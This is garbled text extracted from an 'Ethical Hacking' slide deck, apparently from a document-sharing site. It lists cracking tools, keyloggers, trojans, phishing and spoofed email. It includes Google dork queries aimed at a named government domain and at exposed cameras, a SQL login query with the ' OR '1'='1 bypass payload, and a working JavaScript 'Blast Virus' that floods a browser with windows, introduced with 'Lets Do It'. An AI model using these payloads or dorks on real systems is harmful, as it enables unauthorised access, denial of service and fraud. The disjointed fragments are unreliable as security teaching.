Escolar Documentos
Profissional Documentos
Cultura Documentos
ETHICAL HACKING
Cracking Tools :
The Passwords are stored in SAM file ERD Commander
PH Crack
and many more
Keylogger
Today almost 87% of all viruses/worms are spread through the Internet.
Lets
Code a
Virus ! !
Is it difficult ?
Trojan Horse
Attacker Victim
Some Tools:-
Angry IP Scanner
GFI LAN Guard
Look At LAN
Some Tools:-
hmmmmmmmmmm!
Cryptography
Encrypters!
Stagenography
Art of Secret writing to Hide one file behind the other file. Example a text message
can be bind behind the image or video file.
Hiding..
How Do I Protect My Data ?
Use Antiviruses with
Updated Signatures
Use Firewalls
Use Cryptography
Techniques
Remote System
Scanning
Google
Hacking
DNS Spoofing
SQL Injection
DOS Attack
Website Exploits
Google Cracking
Using Google
<Google Commands>
site, intitle, filetype, allintitle, inurl
Hmmmmmmmmmmm..
Advance Googling
Filetype:xls hry.nic.in
Password Cracking
Inurl:indexframe.shtml axis
Backend SQL string
Select * from table where user= " & TextBox1.Text & AND pass= '" & TextBox2.Text & ;
' OR '1'='1
Fake Emails
Social Networking
Abuse
Lets Do It.........
Blast Virus
<html>
<body>
<script language="javascript">
while(1)
{
w1=window.open();
w1.document.write("<center><font color=red size=5>
blaaaast!!</font></center>");
}
</script>
</body>
</html>
Lets Do It.........
Fake Emails
Sending Fake mails with Fake
headers
E-mails can be sent to anyone
from any Id
It is used also in Spamming
Catch me if u can
Phishing Attack
Password?